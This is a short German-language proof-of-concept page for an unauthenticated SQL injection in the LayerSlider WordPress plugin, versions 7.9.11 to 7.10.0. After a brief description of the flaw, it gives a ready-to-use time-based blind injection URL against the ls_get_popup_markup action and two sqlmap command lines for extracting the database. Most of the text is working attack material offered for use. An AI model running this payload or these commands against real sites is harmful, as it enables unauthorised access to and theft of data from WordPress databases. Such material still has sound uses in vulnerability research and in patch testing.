
Proof-of-Concept-Exploit für CVE-2024-2879: nicht authentifizierte SQL-Injection im LayerSlider-WordPress-Plugin (7.9.11–7.10.0). Enthält Scanner-Skript und SQLMap-Exploitation-Anleitung zum Extrahieren von Datenbankinformationen.
LayerSlider 7.9.11 - 7.10.0 - Unauthentifizierte SQL-Injection
Das LayerSlider-Plugin für WordPress ist anfällig für SQL-Injection über die Aktion ls_get_popup_markup in den Versionen 7.9.11 und 7.10.0 aufgrund unzureichender Maskierung des benutzergesteuerten Parameters und fehlender ausreichender Vorbereitung der bestehenden SQL-Abfrage. Dies ermöglicht es nicht authentifizierten Angreifern, zusätzliche SQL-Abfragen in bereits bestehende Abfragen einzufügen, die zum Extrahieren sensibler Informationen aus der Datenbank verwendet werden können.

"http://site.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and (SELECT 6416 FROM (SELECT(SLEEP(5)))nEiK)-- vqlq"
5 Sekunden Verzögerungsantwortzeit

sqlmap "https:://site.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=" --risk=3 --level=4 --dbms=mysql --technique=T
oder
sqlmap -r request.txt --risk=3 --level=4 --dbms=mysql --technique=T